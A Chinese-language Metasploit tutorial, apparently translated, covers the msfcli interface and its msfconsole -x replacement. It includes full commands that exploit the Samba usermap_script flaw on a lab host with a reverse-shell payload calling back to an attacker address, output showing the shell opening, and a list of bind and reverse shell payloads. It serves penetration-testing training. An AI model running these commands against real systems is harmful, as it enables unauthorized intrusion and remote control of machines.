metasploit基础
Msfcli
什么是Msfcli
msfcli为框架提供了强大的命令行界面。 这使您可以轻松地将Metasploit漏洞利用添加到您可能创建的任何脚本中。
注意:截至2015-06-18 msfcli已被删除。 通过msfconsole获得类似功能的一种方法是使用-x选项。 例如,以下命令设置samba / usermap_script的所有选项,并针对目标运行它:
root@kali:~# msfconsole -x "use exploit/multi/samba/usermap_script;\
set RHOST 172.16.194.172;\
set PAYLOAD cmd/unix/reverse;\
set LHOST 172.16.194.163;\
run"
命令行界面命令
运行msfcli的help命令
root@kali:~# msfcli -h
Usage: /usr/bin/msfcli [mode]
===========================================================
Mode Description
---- -----------
(A)dvanced Show available advanced options for this module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
(H)elp You're looking at it baby!
(I)DS Evasion Show available ids evasion options for this module
(O)ptions Show available options for this module
(P)ayloads Show available payloads for this module
(S)ummary Show information about this module
(T)argets Show available targets for this exploit module
Examples:
msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=IP E
msfcli auxiliary/scanner/http/http_version rhosts=IP encoder= post= nop= E
注意,使用msfcli时使用=来分配变量,并且所有选项都区分大小写
root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
[*] Please wait while we load the module tree...
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
=[ svn r15767 updated today (2012.08.22)
RHOST => 172.16.194.172
PAYLOAD > cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:57682) at 2012-06-14 09:58:19 -0400
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
如果您不完全确定哪些选项属于特定的模块,则可以将字母O附加到字符串末尾,无论您在哪儿碰到这种情况。
root@kali:~# msfcli exploit/multi/samba/usermap_script O
[*] Initializing modules...
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port```
为了显示当前模块可用的payload,在msfcli命令行后面添加字母p
root@kali:~# msfcli exploit/multi/samba/usermap_script P
[*]Initializing modules...
Compatible payloads
===================
Name Description
---- -----------
cmd/unix/bind_awk Listen for a connection and spawn a command shell via GNU AWK
cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent)
cmd/unix/bind_lua Listen for a connection and spawn a command shell via Lua
cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_netcat_gaping_ipv6 Listen for a connection and spawn a command shell via netcat
cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl
cmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl
cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby
cmd/unix/bind_zsh
Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
often available, please be aware it isn't usually installed by default.
cmd/unix/generic Executes the supplied command
cmd/unix/reverse Creates an interactive shell through two inbound connections
cmd/unix/reverse_awk Creates an interactive shell via GNU AWK
cmd/unix/reverse_lua Creates an interactive shell via Lua
cmd/unix/reverse_netcat Creates an interactive shell via netcat
cmd/unix/reverse_netcat_gaping Creates an interactive shell via netcat
cmd/unix/reverse_openssl Creates an interactive shell through two inbound connections
cmd/unix/reverse_perl Creates an interactive shell via perl
cmd/unix/reverse_perl_ssl Creates an interactive shell via perl, uses SSL
cmd/unix/reverse_php_ssl Creates an interactive shell via php, uses SSL
cmd/unix/reverse_python Connect back and create a command shell via Python
cmd/unix/reverse_python_ssl Creates an interactive shell via python, uses SSL, encodes with base64 by design.
cmd/unix/reverse_ruby Connect back and create a command shell via Ruby
cmd/unix/reverse_ruby_ssl Connect back and create a command shell via Ruby, uses SSL
cmd/unix/reverse_ssl_double_telnet Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option
cmd/unix/reverse_zsh
Connect back and create a command shell via Zsh. Note: Although Zsh is often
available, please be aware it isn't usually installed by default
### MSFcli交互的好处
.支持启动漏洞利用exploit和辅助模块auxiliary
.针对特定目标的可行性
.有助于学习
.在测试或者编写新的exploit方便使用
.一次性开发的好工具
.如果你明确知道哪些exploit和选项是你需要的这将会非常好用
.在脚本和基础的自动化利用时非常好用
msfcli唯一真正的缺点是它不像msfconsole那样受支持,它一次只能处理一个shell,这对客户端攻击来说是不切实际的。 它也不支持msfconsole的任何高级自动化功能。